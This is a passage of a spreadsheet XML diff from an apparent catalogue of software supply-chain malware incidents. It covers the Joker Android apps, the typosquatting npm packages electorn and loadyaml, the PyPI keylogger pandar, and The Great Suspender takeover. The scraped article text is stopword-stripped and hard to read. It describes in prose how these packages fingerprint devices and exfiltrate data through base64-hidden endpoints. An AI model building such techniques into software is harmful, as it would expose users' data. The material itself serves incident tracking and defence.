-          <t>trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons tomorrow belongs embrace today asia australia europe india united kingdom united states zdnet france zdnet germany zdnet korea zdnet japan popular topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines trending apple vision review fascinating flawed needs things tried headsets heres people chatgpt chatgpt plus subscription worth hours train fundamentals free upgrade windows home edition useful things flipper zero apple watch year metas rayban smart glasses useful gadget tested year iphone review upgrade samsung galaxy ultra review best smartphones year sonos review close perfect smart speaker need antivirus linux best laptops best vpns best best headphones best robot vacuums zdnet recommends tech gaming headphones laptops mobile accessories networking printers smartphones smart watches speakers streaming devices streaming services tablets wearables kitchen household office furniture office hardware appliances smart home smart lighting yard outdoors innovation artificial intelligence cloud digital transformation energy robotics sustainability transportation work life accelerate tech game paid content space race drive innovation metaverse change future work society managing multicloud future internet rules work tech trends watch business business amazon apple developer ecommerce edge computing enterprise software executive google microsoft professional development social media windows digital transformation trends insights success software development emerging trends changing roles cyber threats password manager ransomware cybersecurity lets tactical securing cloud advice deals howto product comparisons product spotlights reviews buying guides buying guides best allinone computers best budget best gaming cpus best gaming laptops best gaming best headphones best ipads best iphones best laptops best large tablets best oled best robot vacuum mops best rugged tablets best samsung phones best smart rings best smartphones best smartwatches best speakers best tablets best travel vpns best best vpns best coupons topics finance education health special features zdnet depth zdnet recommends newsletters videos editorial guidelines tech home tech google removes android apps caught engaging billing fraud apps infected joker bread malware google described january persistent threats dealt since written catalin cimpanu contributor sept image zscaler special feature securing mobile enterprise mobile devices continue march toward becoming powerful productivity machines also major risks arent managed properly look latest wisdom best practices securing mobile workforce read google removed week android applications official play store apps spotted researchers zscaler infected joker bread malware spyware designed steal messages contact lists device information along silently signing victim premium wireless application protocol services zscaler researcher viral gandhi said week malicious apps uploaded play store month didnt chance gain following downloaded times detected names apps good scanner mint leaf messageyour private message unique keyboard fancy fonts free emoticons tangram lock direct messenger private sentence translator multifunctional translator style photo collage meticulous scanner desire translate talent photo editor blur focus care message part message paper scanner blue scanner hummingbird converter photo good scanner following internal procedures google removed apps play store used play protect service disable apps infected devices users still need manually intervene remove apps devices joker play stores bane recent takedown also marks third action googles team batch jokerinfected apps past months google removed apps start month theyve spotted reported researchers pradeo july google removed another batch jokerinfected apps discovered researchers anquanke batch active since march managed infect millions devices infected apps usually manage sneak past googles defenses reach play store technique called droppers victims device infected multistage process technique quite simple hard defend googles perspective malware authors begin cloning functionality legitimate uploading play store fully functional requests access dangerous permissions also doesnt perform malicious actions first malicious actions usually delayed hours days googles scans dont pick malicious code google usually allows listed play store users device eventually downloads drops hence name droppers loaders components apps device contain joker malware malware strains joker family google tracks internally bread ardent users dropper technique turn allowed joker make play store holy grail malware operations many malware groups january google published blog post described joker persistent advanced threats dealt past years google said teams removed apps play store since joker widespread also found apps uploaded thirdparty android stores well anquanke said detected joker samples since malware first discovered december protecting joker hard users show caution installing apps broad permissions avoid getting infected android news bitdefender reported batch malicious apps googles team apps still available play store bitdefender didnt reveal name apps names developer accounts uploaded users installed apps developers remove right away nouvette piastos progster imirova91 stokegroove volkavstune threatfabric also published report demise cerberus malware rise alien malware contains features steal credentials applications updated september articles publication zimperium kaspersky also published reports joker malware strains confirming recent spike joker activity reported zscaler pradeo anquanke need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone need antivirus linux ways protect getting scammed online phone best free trials habits highly secure remote workers find remove spyware phone editorial standards show comments comment community guidelines related googles pixel best phone deal right best vpns iphone ipad expert tested tested android phones best zdnet equip harness power disruptive innovation work home topics galleries videos sell share personal information zdnet meet team sitemap reprint policy join newsletters site assistance licensing zdnet ventures company rights reserved privacy policy cookie settings advertise terms</t>
+          <t>17 apps containing the Joker malware were found in the Google Play Store.</t>
         </is>
       </c>
       <c r="D150" t="inlineStr">
         <is>
           <t>https://www.zdnet.com/article/google-removes-17-android-apps-doing-wap-billing-fraud-from-the-play-store/</t>
-        </is>
-      </c>
-      <c r="E150" t="inlineStr">
-        <is>
-          <t>['apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'tomorrow', 'embrace', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'apple', 'vision', 'review', 'fascinating', 'flawed', 'need', 'thing', 'headset', 'here', 'people', 'subscription', 'worth', 'hour', 'train', 'fundamental', 'free', 'window', 'home', 'edition', 'useful', 'thing', 'apple', 'watch', 'year', 'rayban', 'smart', 'glass', 'useful', 'gadget', 'year', 'iphone', 'review', 'upgrade', 'ultra', 'review', 'good', 'smartphone', 'year', 'close', 'perfect', 'smart', 'speaker', 'good', 'laptop', 'vpns', 'good', 'headphone', 'good', 'robot', 'vacuum', 'tech', 'gaming', 'headphone', 'laptop', 'mobile', 'accessory', 'networking', 'printer', 'smartphone', 'smart', 'watch', 'speaker', 'streaming', 'device', 'streaming', 'service', 'tablet', 'kitchen', 'household', 'office', 'furniture', 'office', 'hardware', 'appliance', 'smart', 'home', 'smart', 'lighting', 'yard', 'innovation', 'artificial', 'intelligence', 'energy', 'robotic', 'sustainability', 'transportation', 'work', 'life', 'tech', 'game', 'content', 'space', 'race', 'drive', 'innovation', 'metaverse', 'future', 'work', 'society', 'multicloud', 'future', 'internet', 'rule', 'tech', 'trend', 'business', 'business', 'developer', 'edge', 'computing', 'enterprise', 'software', 'executive', 'social', 'medium', 'digital', 'transformation', 'trend', 'insight', 'success', 'software', 'development', 'trend', 'role', 'cyber', 'threat', 'password', 'manager', 'cybersecurity', 'tactical', 'securing', 'cloud', 'advice', 'deal', 'howto', 'product', 'comparison', 'product', 'spotlight', 'review', 'guide', 'guide', 'good', 'allinone', 'computer', 'good', 'budget', 'good', 'gaming', 'cpus', 'good', 'gaming', 'laptop', 'good', 'headphone', 'good', 'ipad', 'good', 'iphone', 'good', 'laptop', 'good', 'large', 'tablet', 'good', 'robot', 'vacuum', 'rugged', 'tablet', 'good', 'phone', 'good', 'smart', 'ring', 'good', 'smartphone', 'good', 'smartwatche', 'good', 'speaker', 'good', 'tablet', 'good', 'vpns', 'good', 'vpns', 'good', 'coupon', 'topic', 'finance', 'education', 'health', 'special', 'zdnet', 'depth', 'newsletter', 'video', 'editorial', 'guideline', 'home', 'tech', 'app', 'billing', 'fraud', 'app', 'joker', 'persistent', 'threat', 'special', 'feature', 'mobile', 'enterprise', 'mobile', 'device', 'march', 'powerful', 'productivity', 'machine', 'major', 'risk', 'late', 'wisdom', 'good', 'practice', 'mobile', 'workforce', 'week', 'application', 'official', 'store', 'app', 'researcher', 'message', 'contact', 'list', 'device', 'information', 'victim', 'premium', 'wireless', 'application', 'protocol', 'service', 'week', 'malicious', 'app', 'play', 'store', 'month', 'time', 'name', 'app', 'good', 'scanner', 'mint', 'leaf', 'private', 'message', 'unique', 'keyboard', 'fancy', 'font', 'free', 'emoticon', 'tangram', 'direct', 'messenger', 'private', 'sentence', 'translator', 'multifunctional', 'translator', 'style', 'photo', 'collage', 'meticulous', 'scanner', 'desire', 'talent', 'photo', 'editor', 'focus', 'care', 'message', 'part', 'message', 'paper', 'scanner', 'blue', 'scanner', 'hummingbird', 'converter', 'photo', 'good', 'scanner', 'internal', 'procedure', 'app', 'store', 'play', 'protect', 'service', 'disable', 'app', 'device', 'user', 'app', 'device', 'joker', 'play', 'store', 'bane', 'recent', 'takedown', 'third', 'action', 'google', 'team', 'batch', 'app', 'month', 'app', 'month', 'researcher', 'batch', 'app', 'researcher', 'anquanke', 'batch', 'active', 'infect', 'million', 'device', 'app', 'sneak', 'google', 'defense', 'play', 'store', 'technique', 'dropper', 'victim', 'device', 'multistage', 'process', 'technique', 'simple', 'google', 'perspective', 'malware', 'author', 'functionality', 'legitimate', 'uploading', 'play', 'store', 'functional', 'request', 'dangerous', 'permission', 'malicious', 'action', 'malicious', 'action', 'hour', 'day', 'google', 'scan', 'malicious', 'code', 'google', 'play', 'store', 'user', 'device', 'drop', 'name', 'dropper', 'component', 'app', 'device', 'joker', 'joker', 'family', 'track', 'ardent', 'user', 'dropper', 'technique', 'turn', 'joker', 'play', 'store', 'grail', 'malware', 'operation', 'many', 'malware', 'group', 'blog', 'post', 'joker', 'persistent', 'advanced', 'threat', 'past', 'year', 'team', 'app', 'store', 'widespread', 'app', 'thirdparty', 'android', 'store', 'joker', 'sample', 'joker', 'hard', 'user', 'caution', 'app', 'broad', 'permission', 'news', 'bitdefender', 'malicious', 'app', 'team', 'app', 'available', 'play', 'store', 'bitdefender', 'name', 'app', 'name', 'developer', 'account', 'user', 'app', 'developer', 'progster', 'imirova91', 'stokegroove', 'report', 'feature', 'credential', 'application', 'article', 'publication', 'zimperium', 'report', 'joker', 'malware', 'recent', 'spike', 'joker', 'activity', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'way', 'scammed', 'online', 'phone', 'good', 'free', 'trial', 'habit', 'secure', 'remote', 'worker', 'spyware', 'phone', 'editorial', 'standard', 'comment', 'comment', 'community', 'guideline', 'google', 'pixel', 'good', 'phone', 'deal', 'good', 'vpns', 'iphone', 'phone', 'good', 'harness', 'power', 'disruptive', 'innovation', 'work', 'home', 'topic', 'gallery', 'video', 'share', 'personal', 'information', 'meet', 'team', 'sitemap', 'reprint', 'policy', 'join', 'site', 'assistance', 'company', 'right', 'privacy', 'policy', 'cookie', 'setting', 'term']</t>
         </is>
       </c>
     </row>
@@ -4353,17 +3765,12 @@
       </c>
       <c r="C151" t="inlineStr">
         <is>
-          <t>skip navigation back platform platform overview automate software supply chain sonatype repository firewall block malicious open source door sonatype nexus repository build fast centralized components sonatype lifecycle control open source risk across sdlc sonatype sbom manager simplify sbom compliance monitoring integrations work tools languages packages already solutions integrated innovation align teams fuel secure deployment developers deliver quality code fast application manage vulnerability risks legal compliance enforce policy scale industry government financial services manufacturing technology healthcare pricing resources resources featured devops downloads webinar series featured state software supply chain blog webinars whitepapers ebooks launchpad customer stories free tools sonatype repository sonatype vulnerability scanner sonatype index customer resources training workshops documentation support partners become partner join extensive sonatype partner network find partner find connect certified sonatype partner company explore software supply chain management story careers innovate us—explore opportunities sonatype events attend inperson virtual learning events newsroom keep date sonatype news contact let’s talk software supply chain book demo book demo book demo sonatype finds malicious packages broadcast username device fingerprint info september sharma minute read time share sonatype researchers discovered confirmed presence vulnerable packages sonatypes discovery initially made malicious code detection bots applying machine learning artificial intelligence identify suspicious code commits update signals developer patterns bots continuously assessing changes across millions open source software component releases following alerts sonatype bots research team verified presence malicious code packages traced intended exploit path packages electorn loadyaml packages representing nextgeneration software supply chain attacks rely typosquatting attack impersonates legitimate packages makes available unsuspecting developers download typosquatting packages prey developer unsuspecting user make minor typographical error trick installing malicious package within environment instead originally intended download example developer requests electron package unintentionally spells electorn installed packages discovered sonatype collect users address geolocation data along devices fingerprinting information publishes data public github page last year sonatype unveiled nextgeneration malicious code detection bots built sonatype intelligence products enable detection malicious releases open source components known counterfeit components blocking within modern software factories release integrity monitoring efforts constantly evolved since continue provide topnotch intelligence protects customers software supply chains diving deep electorn loadyaml multiple packages identified sonatypes malicious code detection bots include electorn loadyaml lodashs loadyml lets take deep dive worth noting four packages share author simplelive12 time research packages electorn loadyaml still available downloads unpublished author sonatype20200784 electorn downloads date package misspells legitimate electron package theres version package available download version comprises three files manifest packagejson indexjs updatejs indexjs file mere placeholder innocuous skeleton code quick glance manifest packagejson reveals interesting findings line electorn touts component electron wrapper offering kind autoupdate functionality vague terms line explicit instructions launch updatejs script background notice shell command soon user attempts install package preinstall scripts executed installation begins finding indicates malicious components author relying user mistyping install electron install electorn line indeed pulls legitimate electron package dependency giving false impression perhaps electorn indeed wrapper package however updatejs concerned legitimate electron doesnt even dependency anywhere collects exposes sensitive information updatejs file contains minified nodejs code packed single line unfolded code reveals functions fingerprint device running collecting logged users username home directory path model information fetchipinfo function gathers users address looks corresponding city country essence malicious behavior lies update function called every hour function uploads collected information public page github nowhere file obvious urls present malware disguises endpoints urls base64 encoded strings example line fetchipinfo function base64 encoded endpoint httpsifconfigcojson returns address geolocation data json response note iconfigco unrelated service legitimate cases used lookups asynchronous function comment line post collected data github apigithubcom publicfacing page exact address endpoint revealed line l3jlcg9zl2g decodes reposrepo namepathissues4comments taking closer look github page comments posted observed comment comprised address city country fingerprint field visible public field contains username logged user home directory followed explained example decoded would look like johnsmithusersjohnsmithintelrcoretmi5xxxxxcpu230ghz image package collects address device fingerprinting information username home directory model publishes data base64 format public github page another observation made github issue page reported comments including duplicates considering package broadcasts collected information every hour older hours deleted entirely clear data processed removed every hours public page sonatype20200784 assigned malicious package electorn sonatype20200781 loadyaml downloads date another package loadyaml published author nearly identical electorn functionality particular exception publishes user data every minutes opposed every hour author simplelive12 also previously published identical typosquatting packages lodashs loadyml downloads later removed could detected flagged anyone sonatype20200781 covers loadyaml lodashs loadyml sonatype release integrity protects software supply chain vulnerable packages accounted sonatypes data sonatype20200781 sonatype20200784 formerly sonatype20200735 four packages published roughly month little downloads combined date electorn lodashs loadyaml loadyml malicious code detection bots picked packages within release downloads flagged suspicious kept customers software supply chains protected start timeline shows confirmation maliciousness occurred recently leading disclosure month deep diving packages releasing findings timeline august malicious package electorn published downloads 17th followed packages loadyml lodashs shortly removed author august sonatype automated malware detection systems pick suspicious packages component added fasttrack data august github issue page opened public begins publishing collected user data comments september sonatype research team performs thorough deep dive analysis electorn identical packages report findings github simultaneously making publicly available reason public disclosure centers fact sensitive information users downloaded packages inadvertently already exposed malicious packages continue exist downloads therefore standard vulnerability disclosure timelines would apply case explained malicious packages flagged suspicious shortly published customers remained safe sonatype research team specializes world class vulnerability research malware research newer offering constantly improving processes comes researching malicious components result although packages automatically identified added data suspicious components early isnt today thorough deep dive research completed confirming malicious actions findings made public going forward malicious package identification deep dive research minimized significantly october following sonatypes report removes packages electorn loadyaml downloads registry github removes publicly visible issue page broadcasting user data growth next generation software supply chain attacks weve shared state software supply chain report types nextgeneration software supply chain attacks sinister actors longer waiting public vulnerability disclosures instead taking initiative actively injecting malicious code open source projects feed global supply chain shifting focus upstream opensource malware electorn actors infect single component case probably distributed downstream using legitimate software workflows update mechanisms report also shows happening rapidly increased rate fact increase nextgeneration software supply chain attacks past year keeping mind virtually impossible manually chase keep track components sonatypes worldclass research data combined automated malware detection technology safeguards developers customers software supply chain infections like remediation devops native organizations ability continuously deploy software releases automation advantage allows stay step ahead malicious intent sonatype nexus repository customers notified malicious packages within hours discovery development teams automatically received instructions remediate risk youre sonatype customer want find code vulnerable sonatypes free sonatype vulnerability scanner find quickly visit sonatype intelligence insights page deep dive vulnerabilities like subscribe automatically receive sonatype intelligence insights press tags vulnerabilities featured news views product nexus intelligence insights malicious code written sharma researcher sonatype engineer holds passion perpetual learning works expert analyses frequently featured leading media outlets expertise lies vulnerability research reverse engineering software development spare time loves exploiting vulnerabilities ethically educating wide range audiences learn author posts topic posts open source mlai models attackers next target sharma packages spread bladeroid cryptostealer hijack instagram sharma curious case csrfmagic case study supply chain poisoning sharma overload unveiling hidden crisis vulnerability management vulnerabilities packages spread bladeroid cryptostealer hijack instagram vulnerabilities exploited ivanti connect ssrf vulnerability traced back xmltooling library vulnerabilities secure software supply chain explore platform started platform overview firewall repository lifecycle sbom manager integrations pricing products container auditor advanced legal pack lifecycle foundation solutions role integrated innovation developers application legal compliance industry government financial services manufacturing technology healthcare community free tools nexus repository sonatype vulnerability scanner sonatype index resources launchpad log4j updates blog whitepapers ebooks webinars customer stories partners find partner become partner amazon services openshift customer portal training workshops documentation sonatype customer support company careers newsroom investors contact press trust center subscribe latest software news events terms service privacy policy modern slavery statement event terms conditions sell personal information copyright 2008present sonatype rights reserved includes thirdparty code listed sonatype sonatype nexus trademarks sonatype apache maven maven trademarks apache software foundation m2eclipse trademark eclipse foundation trademarks property respective owners</t>
+          <t>Sonatype researchers discovered and confirmed the presence of four malicious npm packages named as misspellings of popular products.</t>
         </is>
       </c>
       <c r="D151" t="inlineStr">
         <is>
           <t>https://blog.sonatype.com/sonatype-spots-malicious-npm-packages</t>
-        </is>
-      </c>
-      <c r="E151" t="inlineStr">
-        <is>
-          <t>['navigation', 'back', 'platform', 'platform', 'overview', 'automate', 'software', 'supply', 'chain', 'sonatype', 'repository', 'firewall', 'block', 'malicious', 'open', 'source', 'door', 'sonatype', 'repository', 'fast', 'component', 'lifecycle', 'control', 'open', 'source', 'risk', 'manager', 'compliance', 'monitoring', 'work', 'tool', 'language', 'package', 'solution', 'innovation', 'align', 'team', 'secure', 'deployment', 'developer', 'quality', 'code', 'fast', 'application', 'vulnerability', 'risk', 'legal', 'compliance', 'enforce', 'policy', 'scale', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'pricing', 'resource', 'resource', 'download', 'webinar', 'series', 'state', 'software', 'supply', 'chain', 'blog', 'webinar', 'whitepaper', 'launchpad', 'customer', 'story', 'free', 'tool', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'customer', 'resource', 'training', 'workshop', 'documentation', 'support', 'partner', 'partner', 'extensive', 'sonatype', 'partner', 'network', 'partner', 'connect', 'sonatype', 'partner', 'company', 'software', 'supply', 'chain', 'management', 'story', 'career', 'opportunity', 'event', 'virtual', 'learning', 'event', 'newsroom', 'date', 'sonatype', 'news', 'contact', 'talk', 'software', 'supply', 'chain', 'book', 'demo', 'book', 'demo', 'book', 'demo', 'sonatype', 'malicious', 'package', 'broadcast', 'username', 'device', 'fingerprint', 'info', 'time', 'share', 'sonatype', 'researcher', 'confirmed', 'presence', 'vulnerable', 'package', 'sonatype', 'discovery', 'malicious', 'code', 'detection', 'bot', 'machine', 'artificial', 'intelligence', 'suspicious', 'code', 'update', 'signal', 'developer', 'pattern', 'bot', 'change', 'million', 'open', 'source', 'software', 'component', 'release', 'alert', 'sonatype', 'bot', 'research', 'team', 'presence', 'malicious', 'code', 'package', 'exploit', 'path', 'package', 'loadyaml', 'package', 'nextgeneration', 'software', 'supply', 'chain', 'attack', 'attack', 'impersonate', 'legitimate', 'package', 'available', 'unsuspecting', 'developer', 'package', 'developer', 'unsuspecting', 'user', 'minor', 'typographical', 'error', 'trick', 'malicious', 'package', 'environment', 'download', 'example', 'developer', 'electron', 'package', 'package', 'sonatype', 'user', 'geolocation', 'datum', 'device', 'information', 'datum', 'public', 'page', 'last', 'year', 'sonatype', 'nextgeneration', 'malicious', 'code', 'detection', 'bot', 'sonatype', 'intelligence', 'product', 'detection', 'malicious', 'release', 'open', 'source', 'component', 'counterfeit', 'component', 'modern', 'software', 'factory', 'integrity', 'monitoring', 'effort', 'topnotch', 'intelligence', 'customer', 'software', 'supply', 'chain', 'loadyaml', 'multiple', 'package', 'sonatype', 'malicious', 'code', 'detection', 'bot', 'deep', 'dive', 'worth', 'package', 'share', 'author', 'simplelive12', 'time', 'research', 'package', 'loadyaml', 'available', 'download', 'unpublished', 'author', 'download', 'date', 'package', 'legitimate', 'electron', 'package', 'version', 'package', 'available', 'download', 'version', 'file', 'packagejson', 'indexjs', 'file', 'mere', 'placeholder', 'innocuous', 'quick', 'glance', 'manifest', 'packagejson', 'interesting', 'finding', 'line', 'tout', 'component', 'electron', 'wrapper', 'offering', 'autoupdate', 'functionality', 'vague', 'term', 'explicit', 'instruction', 'updatejs', 'script', 'background', 'notice', 'shell', 'command', 'user', 'package', 'preinstall', 'script', 'installation', 'malicious', 'component', 'author', 'user', 'install', 'electron', 'install', 'line', 'legitimate', 'electron', 'package', 'dependency', 'false', 'impression', 'package', 'concerned', 'legitimate', 'electron', 'collect', 'sensitive', 'information', 'updatejs', 'file', 'single', 'line', 'code', 'function', 'fingerprint', 'device', 'user', 'username', 'home', 'directory', 'path', 'model', 'information', 'function', 'user', 'city', 'country', 'essence', 'malicious', 'behavior', 'update', 'function', 'hour', 'function', 'information', 'public', 'page', 'obvious', 'url', 'present', 'malware', 'disguise', 'url', 'base64', 'string', 'example', 'line', 'function', 'base64', 'endpoint', 'httpsifconfigcojson', 'return', 'geolocation', 'datum', 'response', 'unrelated', 'service', 'legitimate', 'case', 'lookup', 'asynchronous', 'function', 'comment', 'line', 'post', 'datum', 'page', 'exact', 'address', 'endpoint', 'line', 'decode', 'namepathissues4comment', 'close', 'look', 'comment', 'observed', 'comment', 'address', 'city', 'country', 'fingerprint', 'field', 'visible', 'public', 'field', 'username', 'user', 'home', 'directory', 'example', 'johnsmithusersjohnsmithintelrcoretmi5xxxxxcpu230ghz', 'image', 'package', 'address', 'device', 'information', 'username', 'home', 'directory', 'model', 'data', 'base64', 'format', 'public', 'page', 'observation', 'issue', 'page', 'comment', 'duplicate', 'package', 'broadcast', 'information', 'hour', 'old', 'hour', 'clear', 'datum', 'hour', 'public', 'page', 'malicious', 'package', 'loadyaml', 'date', 'package', 'loadyaml', 'author', 'identical', 'electorn', 'functionality', 'particular', 'exception', 'user', 'datum', 'minute', 'hour', 'author', 'identical', 'typosquatting', 'package', 'download', 'integrity', 'software', 'supply', 'chain', 'vulnerable', 'package', 'sonatype', 'datum', 'package', 'month', 'little', 'download', 'date', 'code', 'detection', 'bot', 'package', 'release', 'download', 'suspicious', 'customer', 'software', 'supply', 'chain', 'start', 'timeline', 'confirmation', 'disclosure', 'month', 'deep', 'diving', 'package', 'finding', 'timeline', 'malicious', 'package', 'download', '17th', 'package', 'author', 'sonatype', 'malware', 'system', 'suspicious', 'package', 'component', 'fasttrack', 'datum', 'issue', 'page', 'public', 'begin', 'user', 'datum', 'comment', 'sonatype', 'research', 'team', 'thorough', 'deep', 'dive', 'analysis', 'identical', 'package', 'finding', 'available', 'reason', 'public', 'disclosure', 'center', 'fact', 'sensitive', 'information', 'user', 'package', 'malicious', 'package', 'download', 'standard', 'vulnerability', 'disclosure', 'timeline', 'case', 'malicious', 'package', 'suspicious', 'customer', 'safe', 'sonatype', 'research', 'team', 'world', 'class', 'vulnerability', 'research', 'research', 'new', 'offering', 'process', 'malicious', 'component', 'package', 'datum', 'suspicious', 'component', 'today', 'thorough', 'deep', 'dive', 'research', 'malicious', 'action', 'finding', 'public', 'malicious', 'package', 'identification', 'deep', 'dive', 'research', 'sonatype', 'report', 'package', 'visible', 'issue', 'page', 'user', 'datum', 'growth', 'generation', 'software', 'supply', 'chain', 'attack', 'state', 'software', 'supply', 'chain', 'report', 'type', 'nextgeneration', 'software', 'supply', 'chain', 'attack', 'sinister', 'actor', 'public', 'vulnerability', 'disclosure', 'initiative', 'malicious', 'code', 'open', 'source', 'project', 'global', 'supply', 'chain', 'focus', 'upstream', 'opensource', 'malware', 'actor', 'single', 'component', 'case', 'downstream', 'legitimate', 'software', 'workflow', 'mechanism', 'report', 'rate', 'fact', 'nextgeneration', 'software', 'supply', 'chain', 'attack', 'year', 'mind', 'impossible', 'track', 'component', 'sonatype', 'worldclass', 'research', 'datum', 'malware', 'detection', 'technology', 'developer', 'customer', 'software', 'supply', 'chain', 'infection', 'remediation', 'native', 'organization', 'ability', 'software', 'release', 'automation', 'advantage', 'step', 'malicious', 'intent', 'sonatype', 'nexus', 'repository', 'customer', 'malicious', 'package', 'hour', 'discovery', 'development', 'team', 'instruction', 'remediate', 'risk', 'sonatype', 'customer', 'code', 'vulnerable', 'sonatype', 'free', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'intelligence', 'insight', 'deep', 'dive', 'vulnerability', 'subscribe', 'sonatype', 'intelligence', 'insight', 'press', 'tag', 'vulnerability', 'news', 'view', 'product', 'nexus', 'intelligence', 'insight', 'malicious', 'code', 'researcher', 'sonatype', 'engineer', 'passion', 'perpetual', 'learning', 'work', 'expert', 'analysis', 'medium', 'outlet', 'expertise', 'vulnerability', 'research', 'reverse', 'engineering', 'software', 'development', 'spare', 'time', 'vulnerability', 'wide', 'range', 'audience', 'author', 'topic', 'post', 'open', 'source', 'attacker', 'next', 'package', 'curious', 'case', 'csrfmagic', 'case', 'study', 'supply', 'chain', 'sharma', 'overload', 'crisis', 'vulnerability', 'management', 'package', 'vulnerability', 'connect', 'ssrf', 'vulnerability', 'vulnerability', 'software', 'supply', 'chain', 'platform', 'platform', 'overview', 'firewall', 'repository', 'lifecycle', 'sbom', 'manager', 'pricing', 'product', 'container', 'auditor', 'legal', 'pack', 'lifecycle', 'foundation', 'solution', 'role', 'innovation', 'developer', 'legal', 'compliance', 'industry', 'government', 'financial', 'service', 'manufacturing', 'technology', 'healthcare', 'community', 'free', 'tool', 'nexus', 'repository', 'sonatype', 'vulnerability', 'scanner', 'sonatype', 'index', 'resource', 'update', 'blog', 'whitepaper', 'ebook', 'customer', 'story', 'partner', 'partner', 'partner', 'amazon', 'customer', 'portal', 'training', 'workshop', 'documentation', 'sonatype', 'customer', 'support', 'company', 'career', 'newsroom', 'contact', 'press', 'center', 'late', 'software', 'news', 'event', 'term', 'service', 'privacy', 'policy', 'modern', 'slavery', 'statement', 'event', 'term', 'condition', 'personal', 'information', 'copyright', 'sonatype', 'right', 'thirdparty', 'code', 'sonatype', 'sonatype', 'nexus', 'trademark', 'sonatype', 'trademark', 'foundation', 'trademark', 'property', 'respective', 'owner']</t>
         </is>
       </c>
     </row>
@@ -4378,15 +3785,14 @@
           <t>PyPI</t>
         </is>
       </c>
-      <c r="C152" t="inlineStr"/>
+      <c r="C152" t="inlineStr">
+        <is>
+          <t>pandar was created to mimic pandac or pandas. It collects and exfiltrates user key strokes. IQT's pypi-scan was used to find this typosquatter. The package was reported to PyPI and subsequently removed.</t>
+        </is>
+      </c>
       <c r="D152" t="inlineStr">
         <is>
           <t>https://www.iqt.org/pypi-scan/</t>
-        </is>
-      </c>
-      <c r="E152" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -4403,17 +3809,12 @@
       </c>
       <c r="C153" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert greatsuspender thegreatsuspender public notifications fork star code issues pull requests actions projects wiki insights additional navigation options code issues pull requests actions projects wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service privacy statement we’ll occasionally send account related emails already github sign account jump bottom urgent maintainer probably malicious open calumapplepie opened issue comments open urgent maintainer probably malicious calumapplepie opened issue comments comments copy link calumapplepie commented edited tldr maintainer appears sold extension parties unknown malicious intent exploit users extension advertising fraud tracking v718 extension published store github arbitrary code executed remote server appeared used commit variety tracking fraud actions microsoft 